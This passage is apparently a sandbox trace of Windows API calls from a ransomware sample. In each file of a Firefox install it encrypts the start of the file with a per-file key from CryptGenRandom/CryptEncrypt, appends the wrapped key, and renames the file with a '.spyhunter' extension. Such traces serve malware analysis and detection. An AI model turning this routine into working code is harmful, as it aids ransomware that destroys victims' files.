lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25ce63c*=0x30, lpOverlapped=0x0) returned 1 [0162.677] CloseHandle (hObject=0xb0) returned 1 [0162.677] GetProcessHeap () returned 0x2c0000 [0162.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0162.677] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\webapprt\\omni.ja.spyhunter") returned 69 [0162.677] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\webapprt\\omni.ja" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapprt\\omni.ja"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\webapprt\\omni.ja.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapprt\\omni.ja.spyhunter")) returned 1 [0162.699] GetProcessHeap () returned 0x2c0000 [0162.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0162.699] GetProcessHeap () returned 0x2c0000 [0162.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.699] GetProcessHeap () returned 0x2c0000 [0162.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea87b8 | out: hHeap=0x2c0000) returned 1 [0162.699] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce678 | out: pbBuffer=0x25ce678) returned 1 [0162.699] GetProcessHeap () returned 0x2c0000 [0162.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.700] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce670*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce670*=0x30) returned 1 [0162.700] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\shortcuts_log.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\uninstall\\shortcuts_log.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0162.711] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\shortcuts_log.ini") returned 70 [0162.711] StrStrW (lpFirst="shortcuts_log.ini", lpSrch=".txt") returned 0x0 [0162.711] GetProcessHeap () returned 0x2c0000 [0162.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0162.711] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce634, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce634*=0x142, lpOverlapped=0x0) returned 1 [0162.712] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffebe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.712] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x25ce634, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce634*=0x142, lpOverlapped=0x0) returned 1 [0162.712] GetProcessHeap () returned 0x2c0000 [0162.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0162.712] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.712] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce674*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce634, lpOverlapped=0x0 | out: lpBuffer=0x25ce674*, lpNumberOfBytesWritten=0x25ce634*=0x4, lpOverlapped=0x0) returned 1 [0162.712] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce634, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25ce634*=0x30, lpOverlapped=0x0) returned 1 [0162.712] CloseHandle (hObject=0xb0) returned 1 [0162.712] GetProcessHeap () returned 0x2c0000 [0162.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0162.713] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\shortcuts_log.ini.spyhunter") returned 80 [0162.713] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\shortcuts_log.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\uninstall\\shortcuts_log.ini"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\shortcuts_log.ini.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\uninstall\\shortcuts_log.ini.spyhunter")) returned 1 [0162.713] GetProcessHeap () returned 0x2c0000 [0162.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0162.714] GetProcessHeap () returned 0x2c0000 [0162.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.714] GetProcessHeap () returned 0x2c0000 [0162.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7ece8 | out: hHeap=0x2c0000) returned 1 [0162.714] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce678 | out: pbBuffer=0x25ce678) returned 1 [0162.714] GetProcessHeap () returned 0x2c0000 [0162.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.714] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce670*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce670*=0x30) returned 1 [0162.714] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\helper.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\uninstall\\helper.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0162.715] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\helper.exe") returned 63 [0162.715] StrStrW (lpFirst="helper.exe", lpSrch=".txt") returned 0x0 [0162.715] GetProcessHeap () returned 0x2c0000 [0162.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0162.715] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce634, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce634*=0x2800, lpOverlapped=0x0) returned 1 [0162.765] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.765] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce634, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce634*=0x2800, lpOverlapped=0x0) returned 1 [0162.765] GetProcessHeap () returned 0x2c0000 [0162.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0162.765] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.765] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce674*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce634, lpOverlapped=0x0 | out: lpBuffer=0x25ce674*, lpNumberOfBytesWritten=0x25ce634*=0x4, lpOverlapped=0x0) returned 1 [0162.938] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce634, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25ce634*=0x30, lpOverlapped=0x0) returned 1 [0162.938] CloseHandle (hObject=0xb0) returned 1 [0162.938] GetProcessHeap () returned 0x2c0000 [0162.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0162.938] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\helper.exe.spyhunter") returned 73 [0162.938] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\helper.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\uninstall\\helper.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\helper.exe.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\uninstall\\helper.exe.spyhunter")) returned 1 [0162.939] GetProcessHeap () returned 0x2c0000 [0162.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0162.939] GetProcessHeap () returned 0x2c0000 [0162.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.939] GetProcessHeap () returned 0x2c0000 [0162.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec5c68 | out: hHeap=0x2c0000) returned 1 [0162.939] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce670 | out: pbBuffer=0x25ce670) returned 1 [0162.939] GetProcessHeap () returned 0x2c0000 [0162.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.940] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce668*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce668*=0x30) returned 1 [0162.940] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssdbm3.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0162.940] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.dll") returned 54 [0162.941] StrStrW (lpFirst="nssdbm3.dll", lpSrch=".txt") returned 0x0 [0162.941] GetProcessHeap () returned 0x2c0000 [0162.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0162.941] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce62c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce62c*=0x2800, lpOverlapped=0x0) returned 1 [0163.007] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.007] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce62c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce62c*=0x2800, lpOverlapped=0x0) returned 1 [0163.007] GetProcessHeap () returned 0x2c0000 [0163.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0163.007] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.007] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce66c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce62c, lpOverlapped=0x0 | out: lpBuffer=0x25ce66c*, lpNumberOfBytesWritten=0x25ce62c*=0x4, lpOverlapped=0x0) returned 1 [0163.033] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce62c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25ce62c*=0x30, lpOverlapped=0x0) returned 1 [0163.033] CloseHandle (hObject=0xb0) returned 1 [0163.046] GetProcessHeap () returned 0x2c0000 [0163.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0163.046] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.dll.spyhunter") returned 64 [0163.046] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssdbm3.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.dll.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssdbm3.dll.spyhunter")) returned 1 [0163.047] GetProcessHeap () returned 0x2c0000 [0163.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0163.047] GetProcessHeap () returned 0x2c0000 [0163.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0163.047] GetProcessHeap () returned 0x2c0000 [0163.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec1368 | out: hHeap=0x2c0000) returned 1 [0163.047] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce670 | out: pbBuffer=0x25ce670) returned 1 [0163.047] GetProcessHeap () returned 0x2c0000 [0163.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0163.047] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce668*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce668*=0x30) returned 1 [0163.048] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\nss3.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0163.049] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll") returned 51 [0163.049] StrStrW (lpFirst="nss3.dll", lpSrch=".txt") returned 0x0 [0163.049] GetProcessHeap () returned 0x2c0000 [0163.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0163.049] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce62c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce62c*=0x2800, lpOverlapped=0x0) returned 1 [0163.111] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.111] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce62c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce62c*=0x2800, lpOverlapped=0x0) returned 1 [0163.111] GetProcessHeap () returned 0x2c0000 [0163.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0163.111] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.111] WriteFile (in: hFile=0x178, lpBuffer=0x25ce66c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce62c, lpOverlapped=0x0 | out: lpBuffer=0x25ce66c*, lpNumberOfBytesWritten=0x25ce62c*=0x4, lpOverlapped=0x0) returned 1 [0163.753] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce62c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25ce62c*=0x30, lpOverlapped=0x0) returned 1 [0163.753] CloseHandle (hObject=0x178) returned 1 [0163.753] GetProcessHeap () returned 0x2c0000 [0163.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.753] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll.spyhunter") returned 61 [0163.753] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\nss3.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\nss3.dll.spyhunter")) returned 1 [0163.754] GetProcessHeap () returned 0x2c0000 [0163.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.754] GetProcessHeap () returned 0x2c0000 [0163.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0163.754] GetProcessHeap () returned 0x2c0000 [0163.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebe930 | out: hHeap=0x2c0000) returned 1 [0163.754] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce668 | out: pbBuffer=0x25ce668) returned 1 [0163.754] GetProcessHeap () returned 0x2c0000 [0163.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0163.754] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce660*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce660*=0x30) returned 1 [0163.754] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\handhelds-gnu-z.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\handhelds-gnu-z.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0163.754] GetProcessHeap () returned 0x2c0000 [0163.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0163.754] GetProcessHeap () returned 0x2c0000 [0163.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec5a10 | out: hHeap=0x2c0000) returned 1 [0163.755] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce668 | out: pbBuffer=0x25ce668) returned 1 [0163.755] GetProcessHeap () returned 0x2c0000 [0163.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0163.755] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce660*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce660*=0x30) returned 1 [0163.755] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\gkmedias.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\gkmedias.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0163.755] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\gkmedias.dll") returned 55 [0163.755] StrStrW (lpFirst="gkmedias.dll", lpSrch=".txt") returned 0x0 [0163.755] GetProcessHeap () returned 0x2c0000 [0163.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0163.755] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce624, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce624*=0x2800, lpOverlapped=0x0) returned 1 [0163.763] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.763] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce624, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce624*=0x2800, lpOverlapped=0x0) returned 1 [0163.764] GetProcessHeap () returned 0x2c0000 [0163.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0163.764] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.764] WriteFile (in: hFile=0x178, lpBuffer=0x25ce664*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce624, lpOverlapped=0x0 | out: lpBuffer=0x25ce664*, lpNumberOfBytesWritten=0x25ce624*=0x4, lpOverlapped=0x0) returned 1 [0163.770] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce624, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25ce624*=0x30, lpOverlapped=0x0) returned 1 [0163.770] CloseHandle (hObject=0x178) returned 1 [0163.792] GetProcessHeap () returned 0x2c0000 [0163.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.792] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\gkmedias.dll.spyhunter") returned 65 [0163.793] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\gkmedias.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\gkmedias.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\gkmedias.dll.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\gkmedias.dll.spyhunter")) returned 1 [0163.793] GetProcessHeap () returned 0x2c0000 [0163.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.793] GetProcessHeap () returned 0x2c0000 [0163.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0163.794] GetProcessHeap () returned 0x2c0000 [0163.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0b80 | out: hHeap=0x2c0000) returned 1 [0163.794] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce660 | out: pbBuffer=0x25ce660) returned 1 [0163.794] GetProcessHeap () returned 0x2c0000 [0163.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0163.794] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce658*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce658*=0x30) returned 1 [0163.794] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\firefox.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0163.795] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe") returned 54 [0163.795] StrStrW (lpFirst="firefox.exe", lpSrch=".txt") returned 0x0 [0163.795] GetProcessHeap () returned 0x2c0000 [0163.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0163.795] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce61c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce61c*=0x2800, lpOverlapped=0x0) returned 1 [0163.867] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.867] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce61c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce61c*=0x2800, lpOverlapped=0x0) returned 1 [0163.867] GetProcessHeap () returned 0x2c0000 [0163.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0163.867] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.867] WriteFile (in: hFile=0x178, lpBuffer=0x25ce65c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce61c, lpOverlapped=0x0 | out: lpBuffer=0x25ce65c*, lpNumberOfBytesWritten=0x25ce61c*=0x4, lpOverlapped=0x0) returned 1 [0163.869] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce61c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25ce61c*=0x30, lpOverlapped=0x0) returned 1 [0163.869] CloseHandle (hObject=0x178) returned 1 [0163.869] GetProcessHeap () returned 0x2c0000 [0163.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.869] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe.spyhunter") returned 64 [0163.869] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\firefox.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\firefox.exe.spyhunter")) returned 1 [0163.870] GetProcessHeap () returned 0x2c0000 [0163.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.870] GetProcessHeap () returned 0x2c0000 [0163.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0163.870] GetProcessHeap () returned 0x2c0000 [0163.870] HeapFree (in: 